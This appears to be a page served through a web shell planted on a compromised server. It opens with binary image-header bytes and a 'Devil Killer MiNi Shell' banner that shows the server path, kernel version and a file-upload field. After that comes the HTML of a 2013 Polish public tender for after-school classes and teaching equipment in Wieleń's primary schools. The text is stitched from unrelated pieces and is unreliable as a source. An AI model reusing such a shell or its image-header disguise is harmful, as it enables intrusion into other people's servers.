JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130222/75980-N-2013.html

<p class="kh_header"><b>Wieleń: Świadczenie usługi edukacyjnej w projekcie o tytule, Programy rozwojowe Szkół Podstawowych w gminie Wieleń</b><br>
<b>Numer ogłoszenia: 75980 - 2013; data zamieszczenia: 22.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorządowa Administracja Oświatowa , ul. Drawska 1, 64-730 Wieleń, woj. wielkopolskie, tel. 067 2561118, faks 067 2561021.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi edukacyjnej w projekcie o tytule, Programy rozwojowe Szkół Podstawowych w gminie Wieleń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> POZYCJA WE WSPÓLNYM SŁOWNIKU ZAMÓWIEŃ CPV:
80000000-4- usługi edukacyjne i szkoleniowe
80310000-0- usługi edukacji młodzieży

1.Realizacja zamówienia obejmuje przeprowadzanie dodatkowych zajęć pozalekcyjnych poprzez wdrożenie programów rozwojowych szkół. 
Celem głównym projektu jest wzrost wiedzy i umiejętności uczniów Szkół Podstawowych w gminie wiejsko- miejskiej Wieleń w terminie od 05.02.2013r do 31.12.2014r poprzez wdrożenie programów rozwojowych szkół w projekcie.

Cele szczegółowe projektu to
.	Wzrost wiedzy i umiejętności uczniów z SP w Dzierżążnie Wielkim dzięki udziałowi w zajęciach dodatkowych oraz zajęciach wyrównawczych do 31.12.2014r.
.	Wzrost wiedzy i umiejętności uczniów z SP w Gulczu dzięki udziałowi w zajęciach dodatkowych oraz zajęciach wyrównawczych do 31.12.2014r
.	Wzrost wiedzy i umiejętności uczniów z SP w Miałach dzięki udziałowi w zajęciach dodatkowych oraz zajęciach wyrównawczych do 31.12.2014r
.	Wzrost wiedzy i umiejętności uczniów z SP w Wieleniu dzięki udziałowi w zajęciach dodatkowych oraz zajęciach wyrównawczych do 31.12.2014r
.	Wzrost wiedzy i umiejętności uczniów z SP w Rosku dzięki udziałowi w zajęciach dodatkowych oraz zajęciach wyrównawczych do 31.12.2014r
2.Szczegółowy opis przedmiotu zamówienia -  W zajęciach z beneficjentami  poruszona zostanie kwestia  zasady równością szans kobiet i mężczyzn w życiu społecznym,  zespół nauczycieli, zatrudnionych przez wykonawcę, stworzy program zajęć (na podstawie właściwych założeń projektowych) obejmujący tematykę następujących edukacyjnych zajęć dodatkowych:

a.Zajęcia dodatkowe z informatyki:
Ilość godzin - 720h łącznie dla 9 grup,
SP w Dzierżążnie Wielkim- 120h dla 2 grup (po 60h na każdą grupę)
SP w Miałach- 120h dla 1 grupy
SP w Wieleniu- 240h dla 4 grup (po 60h na każdą grupę)
SP w Rosku- 240h dla 2 grup (po 120h na każdą grupę)
Jednostka zajęciowa (1h)- 45min,
Termin realizacji 
zajęcia realizowane od III 2013r. do XII 2014r (z wyłączeniem świąt, ferii i przerw wakacyjnych)

b.Zajęcia dodatkowe z języka angielskiego:
Ilość godzin - 600h łącznie dla 8 grup,
SP w Dzierżążnie Wielkim- 60h dla 1 grupy
SP w Gulczu- 120h dla 2 grup (po 60h na każdą grupę)
SP w Miałach- 120h dla 1 grupy
SP w Wieleniu- 180h dla 3 grup (po 60h na każdą grupę)
SP w Rosku- 120h dla 1 grupy
Jednostka zajęciowa (1h)- 45min,
Termin realizacji 
zajęcia realizowane od III 2013r. do XII 2014r (z wyłączeniem świąt, ferii i przerw wakacyjnych)

c.Zajęcia dodatkowe z języka niemieckiego:
Ilość godzin - 120h łącznie dla 1 grupy,
SP w Rosku- 120h dla 1 grupy
Jednostka zajęciowa (1h)- 45min,
Termin realizacji 
zajęcia realizowane od III 2013r. do XII 2014r (z wyłączeniem świąt, ferii i przerw wakacyjnych)

d.Zajęcia dodatkowe matematyczno- przyrodnicze:
Ilość godzin - 540h łącznie dla 7 grup,
SP w Dzierżążnie Wielkim- 180h dla 3 grup (po 60h na każdą grupę)
SP w Wieleniu- 120h dla 2 grup (po 60h na każdą grupę)
SP w Rosku- 240h dla 2 grup (po 120h na każdą grupę)
Jednostka zajęciowa (1h)- 45min,
Termin realizacji 
zajęcia realizowane od III 2013r. do XII 2014r (z wyłączeniem świąt, ferii i przerw wakacyjnych)

e.Zajęcia dodatkowe dla uczniów szczególnie uzdolnionych:
Ilość godzin - 240h łącznie dla 3 grup,
SP w Dzierżążnie Wielkim- 60h dla 1 grupy
SP w Gulczu- 60h dla 1 grupy
SP w Rosku- 120h dla 1 grupy
Jednostka zajęciowa (1h)- 45min,
Termin realizacji 
zajęcia realizowane od III 2013r. do XII 2014r (z wyłączeniem świąt, ferii i przerw wakacyjnych)

f.Zajęcia dodatkowe z matematyki:
Ilość godzin - 360h łącznie dla 5 grup,
SP w Gulczu- 180h dla 3 grup (po 60h dla każdej z grup)
SP w Miałach- 120h dla 1 grupy
SP w Wieleniu- 60h dla 1 grupy
Jednostka zajęciowa (1h)- 45min,
Termin realizacji 
zajęcia realizowane od III 2013r. do XII 2014r (z wyłączeniem świąt, ferii i przerw wakacyjnych)

g.Zajęcia dodatkowe z historii:
Ilość godzin - 60h łącznie dla 1 grupy,
SP w Gulczu- 60h dla 1 grupy 
Jednostka zajęciowa (1h)- 45min,
Termin realizacji 
zajęcia realizowane od III 2013r. do XII 2014r (z wyłączeniem świąt, ferii i przerw wakacyjnych)

h.Zajęcia dodatkowe z przyrody:
Ilość godzin - 300h łącznie dla 4 grup,
SP w Gulczu- 180h dla 3 grup (po 60h dla każdej z grup)
SP w Miałach- 120h dla 1 grupy
Jednostka zajęciowa (1h)- 45min,
Termin realizacji 
zajęcia realizowane od III 2013r. do XII 2014r (z wyłączeniem świąt, ferii i przerw wakacyjnych)

i.Zajęcia dodatkowe z techniczne:
Ilość godzin - 60h łącznie dla 1 grupy,
SP w Gulczu- 60h dla 1 grupy
Jednostka zajęciowa (1h)- 45min,
Termin realizacji 
zajęcia realizowane od III 2013r. do XII 2014r (z wyłączeniem świąt, ferii i przerw wakacyjnych)

j.Zajęcia wyrównawcze z języka polskiego:
Ilość godzin - 1140h łącznie dla 13 grup,
SP w Dzierżążnie Wielkim- 120h dla 2 grup (po 60h dla każdej z grup)
SP w Gulczu- 120h dla 2 grup (po 60h dla każdej z grup)
SP w Miałach- 480h dla 4 grup (po 120h dla każdej z grup)
SP w Wieleniu- 180h dla 3 grup (po 60h dla każdej z grup)
SP w Rosku- 240h dla 2 grup (po 120h dla każdej z grup)
Jednostka zajęciowa (1h)- 45min,
Termin realizacji 
zajęcia realizowane od III 2013r. do XII 2014r (z wyłączeniem świąt, ferii i przerw wakacyjnych)

k.Zajęcia wyrównawcze z matematyki:
Ilość godzin - 1020h łącznie dla 12 grup,
SP w Dzierżążnie Wielkim- 120h dla 2 grup (po 60h dla każdej z grup)
SP w Gulczu- 120h dla 2 grup (po 60h dla każdej z grup)
SP w Miałach- 360h dla 3 grup (po 120h dla każdej z grup)
SP w Wieleniu- 180h dla 3 grup (po 60h na każdą grupę)
SP w Rosku- 240h dla 2 grup (po 120h dla każdej z grup)
Jednostka zajęciowa (1h)- 45min,
Termin realizacji 
zajęcia realizowane od III 2013r. do XII 2014r (z wyłączeniem świąt, ferii i przerw wakacyjnych)

l.Zajęcia wyrównawcze przyrodnicze:
Ilość godzin - 180h łącznie dla 3 grup,
SP w Dzierżążnie Wielkim- 180h dla 3 grup (po 60h dla każdej z grup)
Jednostka zajęciowa (1h)- 45min,
Termin realizacji 
zajęcia realizowane od III 2013r. do XII 2014r (z wyłączeniem świąt, ferii i przerw wakacyjnych)

m.Zajęcia z logopedii:
Ilość godzin - 300h łącznie dla 5 grup,
SP w Dzierżążnie Wielkim- 180h dla 3 grup (po 60h dla każdej z grup)
SP w Gulczu- 120h dla 2 grup (po 60h dla każdej z grup)
Jednostka zajęciowa (1h)- 45min,
Termin realizacji 
zajęcia realizowane od III 2013r. do XII 2014r (z wyłączeniem świąt, ferii i przerw wakacyjnych)

n.Zajęcia z gimnastyki korekcyjnej:
Ilość godzin - 240h łącznie dla 3 grup,
SP w Dzierżążnie Wielkim- 120h dla 2 grup (po 60h dla każdej z grup)
SP w Miałach- 120h dla 1 grupy
Jednostka zajęciowa (1h)- 45min,
Termin realizacji 
zajęcia realizowane od III 2013r. do XII 2014r (z wyłączeniem świąt, ferii i przerw wakacyjnych)

o.Zajęcia kompensacyjno- wyrównawcze:
Ilość godzin - 60h łącznie dla 1 grupy,
SP w Gulczu- 60h dla 1 grupy 
Jednostka zajęciowa (1h)- 45min,
Termin realizacji 
zajęcia realizowane od III 2013r. do XII 2014r (z wyłączeniem świąt, ferii i przerw wakacyjnych)

p.Zajęcia korekcyjno- kompensacyjne:
Ilość godzin - 180h łącznie dla 3 grup,
SP w Wieleniu- 180h dla 3 grup (po 60h dla każdej z grup)
Jednostka zajęciowa (1h)- 45min,
Termin realizacji 
zajęcia realizowane od III 2013r. do XII 2014r (z wyłączeniem świąt, ferii i przerw wakacyjnych)

q.Zajęcia psychologiczno- pedagogiczne:
Ilość godzin - 240h łącznie dla 4 grup,
SP w Gulczu- 240h dla 4 grup (po 60h dla każdej z grup)
Jednostka zajęciowa (1h)- 45min,
Termin realizacji 
zajęcia realizowane od III 2013r. do XII 2014r (z wyłączeniem świąt, ferii i przerw wakacyjnych)

r.Zajęcia z terapii pedagogicznej:
Ilość godzin - 120h łącznie dla 2 grup,
SP w Wieleniu- 120h dla 2 grup (po 60h dla każdej z grup)
Jednostka zajęciowa (1h)- 45min,
Termin realizacji 
zajęcia realizowane od III 2013r. do XII 2014r (z wyłączeniem świąt, ferii i przerw wakacyjnych)
Wykonawca przed przystąpieniem do realizacji przedmiotu zamówienia poinformuje Zamawiającego (na piśmie lub osobiście - spotkanie plenarne) o autorskim programie i koncepcji przeprowadzenia zajęć. 

Zaleca się, aby oferent dokonał wizji lokalnej na terenie objętym zakresem rzeczowym zadania oraz zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty. 

Wykonawca dostarczy również następujące pomoce dydaktyczne przewidziane do zakupu w budżecie projektu, na rzecz prawidłowej realizacji przedmiotu zamówienia. Rzeczy te przeznaczone są dla dzieci ze szkół podstawowych do zajęć edukacyjnych - powinny zatem uwzględniać wiek dzieci z SP; powinny posiadać także odpowiednie atesty i certyfikaty zgodności z europejskimi normami oraz być w 100% bezpieczne dla dzieci - beneficjentów ostatecznych w projekcie. 

1.	Doposażenie bazy dydaktycznej  w SP w Dzierżążnie Wielkim:
.	Tablica interaktywna (o parametrach nie gorszych niż: Technologia elektromagnetyczna (dokładność odczytu 50 linii mm) lub podczerwieni. Przekątna tablicy 88, powierzchnia sucho ścieralna odporna na uszkodzenia, anti-reflex, min dwa pisaki bezprzewodowe, możliwość pisania dwoma piórami jednocześnie (technologia  Dual Pen). Rozpoznawanie wykonywanych gestów, auto zapis, rozpoznawanie pisma odręcznego w języku polskim, funkcja chwytania obrazu. Obsługiwane systemy operacyjne Windows 2000,XP,Vista,7 32 bit i 64 bit. Obowiązkowo oprogramowanie w języku polskim oraz  wbudowane interaktywne narzędzia przedmiotowe. Gwarancja 36 miesięcy - 1szt,
.	Projektor do tablicy multimedialnej  (o parametrach nie gorszych niż Jasność min 2500 ANSI lumen, żywotność lampy min 6500h, kontrast 13000:1, min wielkość obrazu 37 cale, moc lampy min 190W. Gwarancja na lampę min 12 miesięcy, projektor 36 miesięcy. Dodatkowo kabel VGA 15m. - 1szt,
.	Laptop (o parametrach nie gorszych niż: Procesor Intel Core i3 2,4GHz, przekątna ekranu 15,6, matryca HD LED, pamięć operacyjna 4GB DDR3, dysk twardy 1TB, karta graficzna o własnej pamięci 1024MB, system operacyjny Windows 7, wbudowana kamera, mikrofon, bluetooth, bezprzewodowa karta sieciowa, czytnik kart, wyjście HDMI, USB 3.0, torba i mysz w zestawie. Gwarancja 24 miesiące)- 1szt,

2.	Doposażenie bazy dydaktycznej  w SP w Gulczu:
.	Tablica interaktywna (o parametrach nie gorszych niż: Technologia elektromagnetyczna (dokładność odczytu 50 linii mm) lub podczerwieni. Przekątna tablicy 88, powierzchnia sucho ścieralna odporna na uszkodzenia, anti-reflex, min dwa pisaki bezprzewodowe, możliwość pisania dwoma piórami jednocześnie (technologia  Dual Pen). Rozpoznawanie wykonywanych gestów, auto zapis, rozpoznawanie pisma odręcznego w języku polskim, funkcja chwytania obrazu. Obsługiwane systemy operacyjne Windows 2000,XP,Vista,7 32 bit i 64 bit. Obowiązkowo oprogramowanie w języku polskim oraz  wbudowane interaktywne narzędzia przedmiotowe. Gwarancja 36 miesięcy - 1szt,
.	Projektor do tablicy multimedialnej  (o parametrach nie gorszych niż Jasność min 2500 ANSI lumen, żywotność lampy min 6500h, kontrast 13000:1, min wielkość obrazu 37 cale, moc lampy min 190W. Gwarancja na lampę min 12 miesięcy, projektor 36 miesięcy. Dodatkowo kabel VGA 15m. - 1szt,
.	Mobilna tablica interaktywna (o parametrach nie gorszych niż: Technologia podczerwieni, przekątna ekranu 150, w zestawie elektroniczny wskaźnik teleskopowy, Obsługiwane systemy operacyjne Windows 2000,XP,Vista,7 32 bit i 64 bit. Oprogramowanie w języku polskim. Gwarancja 36 miesięcy)- 1szt,
.	Netbook (o parametrach nie gorszych niż: Przekątna ekranu 10 cali, ekran z powłoką antyodblaskową LED LCD, procesor Intel 1,6GHz, pamięć operacyjna 2GB DDR3, dysk twardy 320GB, wbudowana kamera, mikrofon, bluetooth, bezprzewodowa karta sieciowa, czytnik kart, wyjście HDMI, USB. System operacyjny Windows 7 Gwarancja 24 miesiące)- 2szt,
.	Kamera cyfrowa (o parametrach nie gorszych niż: Przetwornik CMOS, zapis video na karcie pamięci SDHC, zoom optyczny 10x cyfrowy 200x, stabilizacja obrazu, automatyczna regulacja ostrości, regulacja równowagi bieli, tryb nocny, wyświetlacz LCD o przekątnej 3 cale, wyjście HDMI, port USB 2.0. Równoczesne nagrywanie filmów Full HD i wykonywanie 2-Megapikselowych zdjęć. Gwarancja 24 miesiące.)- 1szt,
.	Zestaw edukacyjnych programów multimedialnych (zestaw 10 programów multimedialnych do nauki matematyki (2szt), języka polskiego (2szt), przyrody (2szt), historii (2szt), języka angielskiego (2szt)) wedle wyboru Wykonawcy- 1 zestaw. 

3.	Doposażenie bazy dydaktycznej  w SP w Miałach:
.	Tablica interaktywna (o parametrach nie gorszych niż: Technologia elektromagnetyczna (dokładność odczytu 50 linii mm) lub podczerwieni. Przekątna tablicy 88, powierzchnia sucho ścieralna odporna na uszkodzenia, anti-reflex, min dwa pisaki bezprzewodowe, możliwość pisania dwoma piórami jednocześnie (technologia  Dual Pen). Rozpoznawanie wykonywanych gestów, auto zapis, rozpoznawanie pisma odręcznego w języku polskim, funkcja chwytania obrazu. Obsługiwane systemy operacyjne Windows 2000,XP,Vista,7 32 bit i 64 bit. Obowiązkowo oprogramowanie w języku polskim oraz  wbudowane interaktywne narzędzia przedmiotowe. Gwarancja 36 miesięcy - 1szt,
.	Projektor do tablicy multimedialnej  (o parametrach nie gorszych niż Jasność min 2500 ANSI lumen, żywotność lampy min 6500h, kontrast 13000:1, min wielkość obrazu 37 cale, moc lampy min 190W. Gwarancja na lampę min 12 miesięcy, projektor 36 miesięcy. Dodatkowo kabel VGA 15m. - 1szt,
.	Laptop (o parametrach nie gorszych niż: Procesor Intel Core i3 2,4GHz, przekątna ekranu 15,6, matryca HD LED, pamięć operacyjna 4GB DDR3, dysk twardy 1TB, karta graficzna o własnej pamięci 1024MB, system operacyjny Windows 7, wbudowana kamera, mikrofon, bluetooth, bezprzewodowa karta sieciowa, czytnik kart, wyjście HDMI, USB 3.0, torba i mysz w zestawie. Gwarancja 24 miesiące)- 1szt,

4.	Doposażenie bazy dydaktycznej  w SP w Wieleniu:
.	Tablica interaktywna (o parametrach nie gorszych niż: Technologia elektromagnetyczna (dokładność odczytu 50 linii mm) lub podczerwieni. Przekątna tablicy 88, powierzchnia sucho ścieralna odporna na uszkodzenia, anti-reflex, min dwa pisaki bezprzewodowe, możliwość pisania dwoma piórami jednocześnie (technologia  Dual Pen). Rozpoznawanie wykonywanych gestów, auto zapis, rozpoznawanie pisma odręcznego w języku polskim, funkcja chwytania obrazu. Obsługiwane systemy operacyjne Windows 2000,XP,Vista,7 32 bit i 64 bit. Obowiązkowo oprogramowanie w języku polskim oraz  wbudowane interaktywne narzędzia przedmiotowe. Gwarancja 36 miesięcy - 1szt,
.	Projektor do tablicy multimedialnej  (o parametrach nie gorszych niż Jasność min 2500 ANSI lumen, żywotność lampy min 6500h, kontrast 13000:1, min wielkość obrazu 37 cale, moc lampy min 190W. Gwarancja na lampę min 12 miesięcy, projektor 36 miesięcy. Dodatkowo kabel VGA 15m. - 1szt,
.	Laptop (o parametrach nie gorszych niż: Procesor Intel Core i3 2,4GHz, przekątna ekranu 15,6, matryca HD LED, pamięć operacyjna 4GB DDR3, dysk twardy 1TB, karta graficzna o własnej pamięci 1024MB, system operacyjny Windows 7, wbudowana kamera, mikrofon, bluetooth, bezprzewodowa karta sieciowa, czytnik kart, wyjście HDMI, USB 3.0, torba i mysz w zestawie. Gwarancja 24 miesiące)- 1szt,

5.	Doposażenie bazy dydaktycznej  w SP w Rosku:
.	Tablica interaktywna (o parametrach nie gorszych niż: Technologia elektromagnetyczna (dokładność odczytu 50 linii mm) lub podczerwieni. Przekątna tablicy 88, powierzchnia sucho ścieralna odporna na uszkodzenia, anti-reflex, min dwa pisaki bezprzewodowe, możliwość pisania dwoma piórami jednocześnie (technologia  Dual Pen). Rozpoznawanie wykonywanych gestów, auto zapis, rozpoznawanie pisma odręcznego w języku polskim, funkcja chwytania obrazu. Obsługiwane systemy operacyjne Windows 2000,XP,Vista,7 32 bit i 64 bit. Obowiązkowo oprogramowanie w języku polskim oraz  wbudowane interaktywne narzędzia przedmiotowe. Gwarancja 36 miesięcy - 1szt,
.	Projektor do tablicy multimedialnej  (o parametrach nie gorszych niż Jasność min 2500 ANSI lumen, żywotność lampy min 6500h, kontrast 13000:1, min wielkość obrazu 37 cale, moc lampy min 190W. Gwarancja na lampę min 12 miesięcy, projektor 36 miesięcy. Dodatkowo kabel VGA 15m.          - 2 szt,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w sytuacji powstania oszczędności lub uzyskania od IP dodatkowych środków na realizację projektu.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.31.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> oferta nie musi być zabezpieczona wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a.	W okresie ostatnich 3 lat, a jeśli okres działalności jest krótszy- w tym okresie, wykonywał lub wykonuje usługi podobne do przedmiotu zamówienia. Aby spełnić ten warunek Wykonawca musi przedstawić realizację min. 1 takiej usługi, których odbiorcami były dzieci z udziałem środków Europejskiego Funduszu Społecznego, a wartość takiej usługi nie może być mniejsza niż 400.000zł brutto. Zamawiający nie żąda aby były to usługi tożsame a jedynie podlegały pod ogólny kod CPV 80000000-4.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b.	Każda osoba przewidziana do prowadzenia zajęć z ramienia Wykonawcy posiada kwalifikacje nie mniejsze niż te które określił Minister Edukacji w rozporządzeniu z dnia 12 marca 2009r. w sprawie szczególnych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków w których można zatrudniać niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli w par. 2 ust. 1, par. 3 lub par. 4.1 lub par. 4.2, uprawdopodobniające że Wykonawca daje rękojmię należytego wykonania zamówienia, tj. posiada kadrę która może prowadzić zajęcia w szkołach.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca udokumentuje, że dysponuje lub będzie dysponował na potrzeby realizacji mniejszego zamówienia min. 1 osobą do każdego rodzaju zajęć</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 
Wykonawca  w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania /odrzuceniem jego oferty/.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>d.	 Wykonawca posiada środki finansowe na rachunku lub zdolność kredytową o wysokości nie mniejszej niż   100.000zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
